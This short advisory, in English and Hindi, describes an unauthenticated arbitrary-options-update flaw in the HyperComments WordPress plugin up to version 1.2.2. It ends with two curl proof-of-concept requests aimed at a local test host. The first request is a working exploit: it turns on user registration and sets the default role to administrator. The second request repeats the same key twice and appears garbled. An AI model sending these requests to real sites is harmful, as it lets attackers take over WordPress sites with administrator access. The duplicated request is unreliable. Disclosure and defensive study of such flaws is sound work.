
HyperComments <= 1.2.2 - Unauthenticated (Subscriber+) Arbitrary Options Update
HyperComments <= 1.2.2 - अप्रमाणित (सब्सक्राइबर+) मनमाना विकल्प अपडेट
वर्डप्रेस के लिए HyperComments प्लगइन में डेटा के अनधिकृत संशोधन की अनुमति है जो 1.2.2 तक (और इसमें शामिल) सभी संस्करणों में hc_request_handler फ़ंक्शन में एक गुम क्षमता जांच के कारण विशेषाधिकार वृद्धि का कारण बन सकता है। इससे अप्रमाणित हमलावरों के लिए वर्डप्रेस साइट पर मनमाना विकल्प अपडेट करना संभव हो जाता है। इसका उपयोग पंजीकरण के लिए डिफ़ॉल्ट भूमिका को प्रशासक में अपडेट करने और उपयोगकर्ता पंजीकरण को सक्षम करने के लिए किया जा सकता है, ताकि हमलावर एक कमजोर साइट पर प्रशासनिक उपयोगकर्ता पहुंच प्राप्त कर सकें।
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
-d "data={\"users_can_register\":\"1\",\"default_role\":\"administrator\"}" \
-H "Content-Type: application/x-www-form-urlencoded"
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
-d "data={\"users_can_register\":\"1\",\"users_can_register\":\"1\"}" \
-H "Content-Type: application/x-www-form-urlencoded"